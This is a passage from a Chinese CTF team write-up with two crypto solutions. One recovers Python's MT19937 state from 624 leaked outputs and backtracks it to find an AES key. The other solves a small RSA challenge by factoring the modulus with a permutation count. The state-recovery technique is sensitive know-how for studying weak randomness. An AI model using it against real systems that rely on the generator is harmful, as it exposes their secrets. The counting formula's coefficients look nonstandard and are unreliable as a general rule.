3244210820, 3839287479, 2283659292, 405764632, 29535149, 2759062778, 1662916252, 2374319319, 3359789079, 1896011543, 1991740933, 2041947596, 3393060496, 996086198, 193135800, 1184463268, 819767446, 410330102, 569788256, 3880255000, 340523190, 885031563, 2752345656, 4116368372, 1738848623, 1895472503, 85502529, 334873925, 3543996685, 3082948803, 3195880838, 1458851187, 2843458392, 20236078, 3136689072, 2121777470, 3543587943, 3590933177, 4057799526, 1241162800, 1014541188, 1031410742, 267989518, 92604561, 2190353015, 87786611, 435741463, 3800398555, 1860727248, 2608606593, 287619193, 768990059, 1686137462, 3255556540, 3234299857, 2087562050, 1575350832, 1982640551, 1476745138, 2757668599, 108958643, 337813164, 273001595, 3515727084, 2976758889, 2674818924, 2133197017, 3709052669, 1992118633, 2421927781, 174599786, 3608298365, 
1708985493, 3925831183, 3063611093, 3852984733, 540242111, 1623482619, 1874921843, 1317809124, 2774735715, 3828180102, 1997343223, 1516869708, 941992323, 307089973, 368181535, 163007409, 596938343, 1686397275, 52708329, 230996593, 3597201983, 378926364, 3618422671, 2062721049, 3659976071, 546629459, 3976307656, 1509609055, 3677736141, 1613243397, 1378877471, 531534610, 2602178644, 4099876535, 1394187732, 1706260244, 1842911215, 3381571710, 456693813, 1667668257, 792813840, 4044011316, 1391972141, 1677638507, 1467741933, 2542725716, 3261642613, 1122181516, 1726857655, 2765884383, 2563231823, 1890137479, 3462591813, 290505918, 3480784421, 4146013364, 906268950, 1460571462, 625398701, 1868955581, 2562420879, 3524561573, 2480663847, 424010572, 3760440358, 506451740, 2616205788, 3835513223, 2698078113, 933669512, 2259175222, 1766445936, 3062774434, 3383207496, 165724374, 717679250, 872303977, 1054921507, 1640987195, 2398705310, 744526846, 2142916476, 3769314780, 3643489144, 906983325, 1001096018, 1522376663, 3516789445, 425379249, 1807654888, 1584889396, 996500676, 2138028000, 1877118731, 2780715755, 56317932, 994780643, 231703463, 1590924826, 449553992, 1970334362, 3631415563, 2378887069, 2645995105, 604040985, 766274135, 2897107084, 3122401328, 604584226, 3514594183, 3159592392, 539086862, 1966827756, 1548312674, 2223920152, 4193868755, 2604831097, 2301554299, 2919432501, 3445772747, 221908018, 1919849944, 1707243688, 1311680342, 1132835813, 824121832, 2623654824, 4245764621, 1669541543, 793028119, 1400611299, 2330555992, 1295319061, 2376883177, 3054784982, 1534527889, 3381065612, 431181624, 2520679460, 1612115175, 3417053178, 3202101207, 4112825474, 209873225, 3982289256, 3175605361, 1007754107, 1533969733, 3657972615, 1233249703, 1775877579, 2812100730, 3215107528, 1781386145, 3025989255, 3066346118, 3283795978, 1197222174, 2936543382, 3503535134, 2892598771, 2621962168, 931511531, 2231087188, 4146539078, 4002087507, 2491835423, 4060649251, 4048333160, 2444738719, 
2691519303, 1556526141, 3615497232, 4050826531, 500299044, 717467546, 2206683369, 861398548, 3151369905, 4029791836, 3416545629, 4120104600, 1465267912, 483234533, 3035820989, 3832933168, 3568690105, 96174302, 2545526712, 1102861924, 1074783639, 4182941480, 1533353222, 1488829617, 1503690984, 185887778, 4211993208, 2290188486, 1146083769, 2041769341, 2684027677, 3176900642, 1387338494, 946259368, 1066487432, 795876682, 3861793354, 1668825820, 216618949, 2896083408, 3851619025, 442276681, 206355214, 270139248, 347366931, 1910792165, 3953458832, 2734158556, 2811136264, 1920172269, 1837836373, 3778467275, 3779230355, 3897121172, 2344011383, 1146522764, 2190434845, 609244986, 2013714652, 560173192, 2402932255, 1072869170, 1770725561, 952360909, 1412825165, 3696544236, 2306376326, 2830983153, 207976619, 4155556879, 3728896627, 2654370117, 3334033001, 1365410137, 1493856098, 1253593280, 1631830970, 5803336, 3918597809, 86127041, 333464839, 3604499396, 149662371, 2129288705, 1461710188, 3760680120, 3729872359, 2100765881, 3535556758, 444301423, 2716178967, 1126522126, 4087265377, 129975151, 3676574817, 946781552, 1144144314, 4160587561, 3992786314, 45372372, 2839307265, 3121990915, 2417091275, 2394722122, 2336989436, 3126674182, 3231554964, 3785353831, 3066121066, 4059908701, 3257600631, 3304564137, 976977941, 2994176851, 3509885563, 436168092, 2194926470, 572263581, 2964578564, 2577729800, 4257414592, 1074783671, 2629434251, 42822614, 1475322010, 3068645543, 3694724738, 3480058324, 4204711804, 3168448984, 2767935672, 3016152818, 4134435775, 2141315517, 2182008981, 2871864678, 2294299758, 1409773258, 3418660825, 3090287076, 3241139267, 2315623533, 2157788904, 334169841, 2062298350, 4075844652, 1672438569, 2994084656, 2204498767, 2430183901, 4179388667, 317027997, 2894184457, 3635887387, 1307832846, 3358657065, 734371454, 610520453, 3421706671, 3240587498, 3690351924, 935152653, 2737123774, 203357945, 1027962332, 3777141639, 743025036, 4046422672, 1085389282, 110265143, 
320421926, 1931570193, 936595461, 2927488848, 2265674314, 3444945553, 786566925, 4133145648, 2879270131, 4165751769, 3985446237, 1971125873, 3724681025, 2661325531, 2441664181, 3290805620, 2459158763, 2102811157, 2881160687, 1153639082, 827213914, 3028527431, 2205345684, 3556675715, 1279123065, 4253124398, 3483559979, 4068430995, 4141206587, 2571521727, 2944439402, 443124686, 2268164570, 2235451426, 3679071975, 3129207272, 2516367556, 1468462786, 1881517367, 3491042253, 2913831047, 3164481275, 202602034, 3150723817, 1533130707, 1912730441, 2090267514, 3558123575, 1133228007, 3421482977, 2553693497, 3421969717, 2520271965, 2067324870, 1223636150, 2714495378, 3773685424, 2961634881, 88882886, 408668635, 904339271, 3187997208, 2883270961, 1911371885, 1111177434, 3677904221, 1424566197, 456428662, 3160502725, 2571618126, 1931038165, 1229862345, 885692642, 928907436, 281108918, 2025639202, 4098934983, 245166619, 3978368942, 2335134348, 2663736265, 3483476476, 1019177183, 1076843627, 2150626843, 3549898506, 497411044, 2948681730, 1293862520, 3364439483, 200913955, 876046583, 2810673955, 2828391839, 1905062360, 3783182365, 2472665728, 1439731349, 2736703148, 3316496080, 2996051367, 448455111, 3808598160, 2313472828, 1619655346, 1198200314, 3744504057, 1680713197, 2474661491, 3214410863, 1662774943, 3537885099, 3365412658, 3583677483]

再到GitHub里看这篇https://github.com/NonupleBroken/ExtendMT19937Predictor可以预测和回溯得到`data`,学习下面`randbytes`函数,写代码得到`key`,解`aes`即可

![Untitled](viol1t战队WP/Untitled (3).png)

from Crypto.Cipher import AES
from extend_mt19937_predictor import ExtendMT19937Predictor

predictor = ExtendMT19937Predictor()
data = [3086615663, 3771906507, 1933791567, 874400704, 4000928288, 1101512046, 3757205682, 895930285, 2975657910, 1590250704, 227397937, 3163700038, 1702493296, 86408336, 1317214060, 355017934, 4281601498, 2958424486, 3248821687, 1977038961, 75767861, 1848107476, 1201089736, 1669521311, 3079560731, 753259725, 2783047520, 1792692953, 1335325755, 4118154638, 221587457, 3931660158, 2105971738, 205787269, 3306213190, 3047766446, 757659831, 70863674, 2054184739, 418281550, 2654142751, 3195128907, 3920550815, 273337573, 856860348, 2332777112, 1144893468, 4097373151, 2348453877, 3391728911, 1909111864, 1167657184, 1690201897, 3037596190, 2683689827, 2591985588, 483396539, 583852871, 4213595783, 3297463098, 3940471284, 3167491933, 3836764654, 385184073, 4089593895, 2435556034, 2689611721, 3009515703, 2557788155, 742759035, 2911234764, 2747466359, 1658388676, 77325257, 1282826102, 833518584, 258773596, 1252680510, 2161330425, 1505524757, 1106189058, 2479195181, 4059279758, 4087261637, 2802856115, 215936888, 385734300, 3976823712, 2155716808, 166878602, 2958581226, 2153643018, 3459229793, 166654981, 1135752470, 2999716815, 102870168, 3592405002, 143561712, 3332529987, 3320611547, 176304087, 3809410875, 956905158, 3283895217, 1267764884, 1781613649, 2648889013, 4023857409, 2805378741, 2649655508, 2608225929, 2196639843, 2844902511, 1947381383, 133311662, 3189375534, 3360781939, 2598704112, 449730728, 1660136746, 2120362421, 4282918442, 553031705, 2359175283, 1820194402, 3326941501, 2079373053, 3848840564, 674418166, 2099289575, 3503720323, 71654499, 1153326313, 560391397, 987219237, 3519108661, 343772283, 2206155982, 1710469128, 4284016382, 1099544658, 2385903806, 435889661, 1754514095, 1654595795, 2611465271, 2924309399, 3849122741, 2771388572, 132443906, 639488960, 1702455392, 1197499823, 3431742381, 1162507747, 1956793904, 2882150352, 1024607141, 573195509, 4026654414, 2622992078, 3350586931, 3799382718, 189653578, 2030853706, 2360599919, 1447670146, 3029293260, 449492231, 
794537698, 2013929440, 2521582617, 3662902133, 2988382934, 1101429406, 2204422539, 2884223003, 4160719615, 378925199, 321253023, 713869660, 1722066591, 4190495614, 3241838993, 3156104799, 3976107465, 690141471, 2565083608, 629627271, 3367902606, 3025623735, 1771459709, 2325207656, 29331249, 1631496960, 1272596234, 677116176, 36223230, 1894006200, 1868323656, 147662067, 3018282350, 847618418, 473803624, 303813116, 1222076488, 2857631548, 1620440323, 3028453586, 3771115277, 974948581, 2805463577, 3012869721, 1677541868, 873746956, 3206333732, 3540196648, 4222297189, 3955666095, 3723668809, 3383181896, 1572023031, 3593767211, 4139994756, 2493637240, 1055398974, 3491895839, 2158774748, 4074778554, 2265454243, 3123246270, 3737495019, 3584208536, 505004504, 711346815, 2265659930, 44813444, 762261590, 2345302575, 3635851795, 2255282129, 3598634106, 921749760, 1418440684, 3784150188, 2393915660, 2720478000, 1612782044, 4147046015, 2561634247, 586916363, 1606384598, 1299844033, 4047608483, 3431257347, 781242816, 3127114595, 1484369015, 483654543, 678493767, 2757899632, 3276695749, 1363370762, 1578035875, 555054787, 3093962781, 2222987767, 2130200534, 2053306276, 3948690640, 3249023873, 2343777324, 2833997966, 44199340, 1950451402, 1448991312, 1055067146, 3980624341, 1812874122, 2512418377, 3541037815, 714180005, 987816438, 3414079245, 1619142872, 4122595525, 3638144912, 3337941608, 2664929972, 1577036940, 206102296, 2850863132, 3729200403, 644729416, 844182047, 2261919397, 1040614315, 1776485562, 677708826, 223842114, 2591956969, 3141458682, 4271489476, 4253854271, 3973860423, 2805984925, 2908508806, 2328769351, 3865140, 4170270812, 1373888554, 1702101960, 3761095439, 3848481069, 812779025, 2073985983, 239315333, 1585392927, 2233774162, 2308108952, 3393306946, 2891660426, 1059096016, 2448311649, 2662483261, 422228248, 2356192519, 4004741305, 432651290, 2419877069, 3136967672, 329338548, 510605497, 2753410852, 2256462380, 3602678268, 2558451886, 324326056, 3822050324, 
944965241, 4107093336, 1023337388, 564298141, 2977064774, 1802025909, 2329346614, 1460784428, 2510641562, 593994802, 4034614216, 4154528137, 3061249939, 487067285, 2856327155, 1909407614, 1782934804, 947220403, 2311402749, 3528590202, 2841893555, 3179384475, 3485733076, 87074890, 753396673, 790057962, 378850528, 3789224576, 3983502105, 1166116, 1854075229, 965611444, 3399039227, 3301304385, 3499808775, 1553588463, 2562124078, 3702675704, 1456114141, 768418804, 2227423616, 3711148950, 2738970313, 4033988307, 1184409529, 3461105405, 2986057969, 2112332635, 615658869, 2858394250, 2819269426, 499315937, 1714425168, 3816439521, 4188657733, 1226314395, 773286132, 1257824142, 2439511774, 1412431345, 451028253, 102711904, 3272107935, 1915128127, 674941443, 1907183006, 4205826365, 2592631544, 2001660887, 1793337902, 336832953, 1676534641, 439197643, 2175306211, 1969440247, 4084563735, 564896680, 1293717918, 1136684128, 4289259757, 2368216261, 3167549822, 1998645278, 2908859410, 2014400533, 1482521794, 3082876093, 2742987778, 3273667028, 1654313273, 3551772744, 1923315597, 1063687791, 1907747434, 3323400678, 3445870975, 316314436, 3905619499, 853586576, 456263058, 3213830894, 3603099146, 1478599807, 344267130, 1085971878, 2416474796, 247701271, 2926294528, 1981779524, 3809025846, 2106937971, 1596271124, 1289668306, 1824884242, 543613169, 2698011204, 1632632104, 179981234, 1091171130, 608067622, 4034608897, 2707671187, 2261524231, 2177175178, 1649366013, 733151281, 2783115482, 389580085, 495962438, 512715565, 1917819840, 1993385884, 2910358830, 3223741704, 3302008571, 857474180, 143995596, 3194737469, 2792999636, 111369357, 2665449999, 3481184513, 21965724, 172308864, 3373225896, 3941204120, 1487487599, 2697473345, 4173199839, 1988623177, 3567610975, 2393053467, 2231132558, 3798877543, 4275987399, 3626515970, 3957758644, 3196139612, 1577858639, 4145376193, 3982712357, 1316354617, 2476570111, 2796635786, 3673095113, 317782376, 38302891, 2729549772, 3124741082, 779634809, 
480059945, 1764557943, 1905762442, 2439926326, 3398546304, 1275206055, 3578388510, 4286589961, 2284154687, 1547652572, 211218778, 4019993609, 1035325551, 47385212, 1413260320, 1895132671, 2144191841, 976730195, 880818479, 2944522030, 3051883625, 941172532, 1956827360, 604038865, 1490554868, 2014326554, 3585424155, 1705580179, 1484996770, 3145161387, 2410763156, 1196196268, 4125882510, 1569631240, 3635487118, 3743075539, 53348120, 3549050110, 2179975673, 1455493727, 909517499, 2034744814, 1815931219, 2625466993, 2328144852, 3083176966, 4185591290, 4232725936, 233807337, 987553443, 25498384, 1577858645, 3349985471, 222166290, 1566719496, 4025597331, 454410574, 4172717618, 3397690720, 1563985388, 1294197484, 454917824, 250364909, 1076318659, 3751354075, 3324840413, 2834288682, 1309780963, 3789459740, 1605544538, 1448439145, 1158482892, 407656226, 3589982226, 2670402128, 2795218845, 4079499284, 2736737218, 468906864, 347349067, 3541605667, 1532233501, 1192558327, 3650037602, 1570092544, 3596826230, 2768927258, 1775543901, 1324819997, 3401066173, 4078892370, 3373389918, 3360817112, 3261261117, 2443241006, 847292772, 3862028592, 4086319712, 1837673494, 3577160747, 2636413549, 4021668342, 573747407, 3546255858, 2787607684, 403421850, 3477281082, 4133820736, 332805644, 3663845239, 80993494, 344033777, 1187319040, 1547969768]

# Feed the 624 leaked 32-bit outputs so the predictor holds the full MT19937
# state, rewind past them, then rewind a further 128 bits: per the write-up
# those are the bits randbytes(16) consumed for the AES key, little-endian.
for index in range(624):
    predictor.setrandbits(data[index], 32)

for _ in range(624):
    predictor.backtrack_getrandbits(32)

key_bits = predictor.backtrack_getrandbits(16 * 8)
key = key_bits.to_bytes(16, 'little')
cipher = AES.new(key, AES.MODE_ECB)
c = b'a\\x93\\xdc\\xc3\\x90\\x0cK\\xfa\\xfb\\x1c\\x05$y\\x16:\\xfc\\xf3+\\xf8+%\\xfe\\xf9\\x86\\xa3\\x17i+ab\\xca\\xb6\\xcd\\r\\xa5\\x94\\xeaVM\\xdeo\\xa7\\xdf\\xa9D\\n\\x02\\xa3'
flag = cipher.decrypt(c)
print(flag)

fl@g

学习下概率论里的包含排斥原理

table的长度是66,算出"flag"、"FLAG"、"f14G"、"7!@9"排列的情况 x=factorial(63)*4-factorial(60)*4+factorial(57),之后就是很简单的rsa

from Crypto.Util.number import *
from sympy import *
from math import factorial
import string

# Character table the challenge draws from; only its length (66) matters here
table = string.ascii_letters + string.digits + "@?!*"
n = 10179374723747373757354331803486491859701644330006662145185130847839571647703918266478112837755004588085165750997749893646933873398734236153637724985137304539453062753420396973717
c = 1388132475577742501308652898326761622837921103707698682051295277382930035244575886211234081534946870195081797116999020335515058810721612290772127889245497723680133813796299680596

# Inclusion-exclusion count from the write-up: 4*63! - 4*60! + 57!;
# p is the next prime above it and q follows from n.
x = factorial(63) * 4 - factorial(60) * 4 + factorial(57)
p = nextprime(x)
q = n // p
phi = (p - 1) * (q - 1)
d = inverse(65537, phi)
m = pow(c, d, n)
print(long_to_bytes(m))